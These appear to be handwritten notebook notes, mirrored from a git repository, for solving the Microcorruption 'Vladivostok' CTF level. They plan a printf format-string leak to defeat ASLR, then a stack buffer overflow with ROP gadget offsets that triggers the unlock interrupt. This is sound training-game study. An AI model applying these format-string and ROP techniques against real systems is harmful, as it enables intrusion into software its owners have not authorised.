mirror of
https://git.soft.fish/val/MicroCorruption.git
synced 2024-11-24 07:25:58 +00:00
62 lines
1.4 KiB
Markdown
62 lines
1.4 KiB
Markdown
`Taken verbatim from my notebook`
|
|
# Page 1
|
|
```
|
|
Vladivostok ASLR bypass?
|
|
username[8]: 0x242b
|
|
password[ ]
|
|
aslr_base = r11
|
|
|
|
aslr_address = normal - 0x4000 + aslr_base
|
|
|
|
Have to call 0x10 directly?
|
|
INT 7f:
|
|
Takes no arguments (THE LESSON WAS)
|
|
7f passed in SR (ROP CHAINING)
|
|
All calls to INT wrapped in (+ASLR BYPASS)
|
|
push/pop SR?
|
|
Neat?
|
|
|
|
41414141[r10][r11][ret]
|
|
FUCKING PRINTF?
|
|
|
|
Things I have:
|
|
printf(username, ...)
|
|
buffer overflow on stack
|
|
|
|
Things I need
|
|
Address on stack?
|
|
|
|
Flow: 1. enter "username"
|
|
2. "username" printed
|
|
<- Create payload
|
|
3. enter "password"
|
|
4. buffer overflow
|
|
```
|
|
|
|
# Page 2
|
|
```
|
|
The Hack (Vladivostok)
|
|
|
|
Uname payload: "%x%x%x%x"
|
|
output %printf
|
|
Pword payload: "AAAA(r10)(r11)(pc)[args...]"
|
|
|
|
Useful locations:
|
|
+2aa: pop sr
|
|
+2ac: add 8, sp
|
|
+2ae: __check_password
|
|
|
|
+56c: mov.b @sp, r15;
|
|
sxt r15 ; pop.b r15
|
|
incd sp ;
|
|
ret ;
|
|
|
|
+4f4: swpb r15 ;
|
|
mov r15, sr ;
|
|
bis #8000, sr ; INT
|
|
call 0x10 ;
|
|
... ;
|
|
ret ;
|
|
|
|
[popb]7f7f[INT]
|